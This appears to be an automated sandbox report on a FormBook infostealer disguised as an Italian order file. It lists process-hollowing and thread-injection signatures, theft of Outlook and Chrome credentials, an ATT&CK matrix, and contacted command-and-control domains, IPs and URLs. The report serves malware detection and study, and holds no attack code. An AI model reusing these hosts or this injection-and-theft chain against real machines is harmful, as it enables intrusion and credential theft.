          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 148.251.13.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.treebarktees.com
          Source: C:\Windows\explorer.exeDomain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeDomain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exeDomain query: www.specigain.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.22.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exeDomain query: www.gachthe365.site
          Source: C:\Windows\explorer.exeDomain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.191.208.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.verde-amar.info
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1A0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F7D008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000002.00000002.527996551.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.292892221.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.270128037.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.521890354.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeQueries volume information: C:\Users\user\Desktop\Requisito ordine n. 230210.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts812
          Process Injection          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory13
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		Security Account Manager21
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Timestomp          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Masquerading          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)812
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 803902 Sample: Requisito ordine n. 230210.exe Startdate: 10/02/2023 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 5 other signatures 2->38 8 Requisito ordine n. 230210.exe 1 2->8         started        process3 file4 24 C:\...\Requisito ordine n. 230210.exe.log, CSV 8->24 dropped 50 Writes to foreign memory regions 8->50 52 Allocates memory in foreign processes 8->52 54 Injects a PE file into a foreign processes 8->54 12 CasPol.exe 8->12         started        15 conhost.exe 8->15         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Sample uses process hollowing technique 12->60 62 Queues an APC in another process (thread injection) 12->62 17 explorer.exe 2 6 12->17 injected process8 dnsIp9 26 krankenzusatz.net 81.169.145.158, 49696, 49697, 49698 STRATOSTRATOAGDE Germany 17->26 28 frogair.online 81.169.145.72, 49693, 49694, 49695 STRATOSTRATOAGDE Germany 17->28 30 13 other IPs or domains 17->30 40 System process connects to network (likely due to code injection or exploit) 17->40 21 svchost.exe 13 17->21         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 21->42 44 Tries to harvest and steal browser information (history, passwords, etc) 21->44 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Requisito ordine n. 230210.exe18%ReversingLabs
          Requisito ordine n. 230210.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.CasPol.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.specigain.online0%Avira URL Cloudsafe
          http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7S0%Avira URL Cloudsafe
          http://www.nkgtrust.org/vqh7/0%Avira URL Cloudsafe
          http://www.verde-amar.info/vqh7/0%Avira URL Cloudsafe
          http://www.treebarktees.com/vqh7/0%Avira URL Cloudsafe
          http://www.gachthe365.site/vqh7/0%Avira URL Cloudsafe
          http://www.dinggubd.net/vqh7/0%Avira URL Cloudsafe
          http://www.dinggubd.netReferer:0%Avira URL Cloudsafe
          http://www.awc.icu/vqh7/0%Avira URL Cloudsafe
          http://www.gachthe365.site/vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.krankenzusatz.net0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/-0%Avira URL Cloudsafe
          http://www.specigain.online/vqh7/0%Avira URL Cloudsafe
          http://www.hotelyeah.top0%Avira URL Cloudsafe
          http://www.readyexechub.com90%Avira URL Cloudsafe
          http://www.nativealternatives.com/vqh7/0%Avira URL Cloudsafe
          http://www.nativealternatives.comReferer:0%Avira URL Cloudsafe
          http://www.dinggubd.net0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.ukReferer:0%Avira URL Cloudsafe
          http://www.awc.icu0%Avira URL Cloudsafe
          http://www.gachthe365.site0%Avira URL Cloudsafe
          http://www.otopodlogi.com0%Avira URL Cloudsafe
          http://www.frogair.online100%Avira URL Cloudmalware
          http://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.nativealternatives.com0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyou0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.e0%Avira URL Cloudsafe
          http://www.nkgtrust.org0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/0%Avira URL Cloudsafe
          http://www.awc.icuReferer:0%Avira URL Cloudsafe
          https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6e0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyou/vqh7/0%Avira URL Cloudsafe
          http://www.otopodlogi.comReferer:0%Avira URL Cloudsafe
          http://www.krankenzusatz.netReferer:0%Avira URL Cloudsafe
          http://www.nkgtrust.orgReferer:0%Avira URL Cloudsafe
          http://www.krankenzusatz.net/vqh7/0%Avira URL Cloudsafe
          http://www.readyexechub.com/vqh7/0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF100%Avira URL Cloudmalware
          http://www.heroclassicrally.co.uk0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/100%Avira URL Cloudmalware
          http://www.readyexechub.com0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyouReferer:0%Avira URL Cloudsafe
          http://www.verde-amar.info0%Avira URL Cloudsafe
          http://www.specigain.online/vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/K6jN0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF0%Avira URL Cloudsafe
          http://www.jewelryimpact.com0%Avira URL Cloudsafe
          http://www.treebarktees.com0%Avira URL Cloudsafe
          http://www.hotelyeah.topReferer:0%Avira URL Cloudsafe
          http://www.awc.icu/vqh7/o0%Avira URL Cloudsafe
          http://www.otopodlogi.com/vqh7/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          treebarktees.com
          		103.191.208.50
          		truetrue
            		unknown
            krankenzusatz.net
            		81.169.145.158
            		truetrue
              		unknown
              www.nativealternatives.com
              		91.195.240.117
              		truetrue
                		unknown
                www.jewelryimpact.com
                		81.17.18.198
                		truetrue
                  		unknown
                  hotelyeah.top
                  		75.102.22.168
                  		truetrue
                    		unknown
                    gachthe365.site
                    		148.251.13.126
                    		truetrue
                      		unknown
                      www.specigain.online
                      		199.192.22.198
                      		truetrue
                        		unknown
                        frogair.online
                        		81.169.145.72
                        		truetrue
                          		unknown
                          www.treebarktees.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.hotelyeah.top
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tobinrasheedja.cyou
                              		unknown
                              		unknowntrue
                                		unknown
                                www.gachthe365.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.frogair.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.krankenzusatz.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.verde-amar.info
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.treebarktees.com/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gachthe365.site/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gachthe365.site/vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.specigain.online/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nativealternatives.com/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.krankenzusatz.net/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.frogair.online/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.jewelryimpact.com/vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.hotelyeah.top/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.specigain.online/vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.hotelyeah.top/vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MFtrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabsvchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                          		high
                                          http://www.specigain.onlineexplorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=50-ET7Wv7.11.drfalse
                                            		high
                                            http://www.frogair.onlineexplorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7Sexplorer.exe, 00000002.00000002.537406866.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003DBC000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://search.yahoo.com?fr=crmas_sfpfsvchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drfalse
                                              		high
                                              http://www.verde-amar.info/vqh7/explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dinggubd.net/vqh7/explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nkgtrust.org/vqh7/explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dinggubd.netReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.awc.icu/vqh7/explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.krankenzusatz.netexplorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heroclassicrally.co.uk/vqh7/-explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hotelyeah.topexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dinggubd.netexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nativealternatives.comReferer:explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.readyexechub.com9explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heroclassicrally.co.uk/vqh7/explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nativealternatives.comexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.530473205.00000000085EF000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gachthe365.siteexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.awc.icuexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tobinrasheedja.cyouexplorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
